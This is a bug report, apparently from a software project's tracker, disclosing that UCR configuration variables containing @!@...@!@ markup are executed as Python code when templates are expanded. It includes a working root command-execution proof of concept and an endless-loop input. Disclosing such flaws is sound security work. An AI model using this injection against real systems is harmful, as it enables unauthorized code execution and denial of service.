Description Florian Best 2019-07-16 10:33:24 CEST

If a UCR template contains @%@foo@%@ the UCR variable "foo" might contain @!@...@!@ which would then be evaluated as python code.

Example:
# ucr set ldap/debug/level='@!@import os; os.system("id >> /tmp/executed");@!@'
Setting ldap/debug/level
Multifile: /etc/ldap/slapd.conf
# cat /tmp/executed
uid=0(root) gid=0(root) Gruppen=0(root)
uid=0(root) gid=0(root) Gruppen=0(root)
uid=0(root) gid=0(root) Gruppen=0(root)
uid=0(root) gid=0(root) Gruppen=0(root)
uid=0(root) gid=0(root) Gruppen=0(root)
uid=0(root) gid=0(root) Gruppen=0(root)
uid=0(root) gid=0(root) Gruppen=0(root)
uid=0(root) gid=0(root) Gruppen=0(root)
uid=0(root) gid=0(root) Gruppen=0(root)

The same applies for Code inside of @!@ which prints @!@-code.
Here is code which causes an endless loop:
# echo '@!@print(open('foo.tpl').read())@!@' > foo.tpl
# ucr filter < foo.tpl
… runs forever…

I think this is
1. bad and unexpected behavior
2. a potential security risk as ucr_filter() is e.g. used elsewhere, too
(e.g. in the appcenter without UCR variables)